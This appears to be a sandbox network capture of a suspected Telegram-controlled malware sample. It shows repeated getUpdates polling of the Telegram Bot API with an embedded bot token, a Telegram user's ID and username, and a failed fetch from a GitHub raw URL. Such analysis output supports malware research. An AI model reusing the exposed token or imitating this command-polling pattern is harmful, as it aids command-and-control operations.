2024-06-05 01:57:12 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:12 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:12 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49782	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:12 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:13 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:13 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:13 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	49783	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:14 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:14 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:14 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:14 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49784	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:14 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:15 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:15 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:15 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	49786	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:16 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:16 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:16 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:16 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	49787	185.199.109.133	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:16 UTC	108	OUT	GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-06-05 01:57:16 UTC	802	IN	HTTP/1.1 404 Not Found Connection: close Content-Length: 14 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block Content-Type: text/plain; charset=utf-8 X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CC Accept-Ranges: bytes Date: Wed, 05 Jun 2024 01:57:16 GMT Via: 1.1 varnish X-Served-By: cache-dfw-kdfw8210083-DFW X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1717552637.562970,VS0,VE2 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: db6fc59a4e8288af3e1783667487eed2b0b3d419 Expires: Wed, 05 Jun 2024 02:02:16 GMT Source-Age: 47
2024-06-05 01:57:16 UTC	14	IN	Data Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404: Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	49788	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:17 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:17 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:17 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:17 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.4	49789	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:18 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:18 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:18 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:18 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.4	49790	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:19 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:19 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:19 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:19 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.4	49791	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:20 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:20 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:20 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:20 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.4	49792	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:21 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:21 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:21 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:21 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	49793	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:22 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:22 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:22 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:22 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	49794	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:23 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:23 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:23 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:23 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49795	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:24 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:24 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:24 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:24 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	49796	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
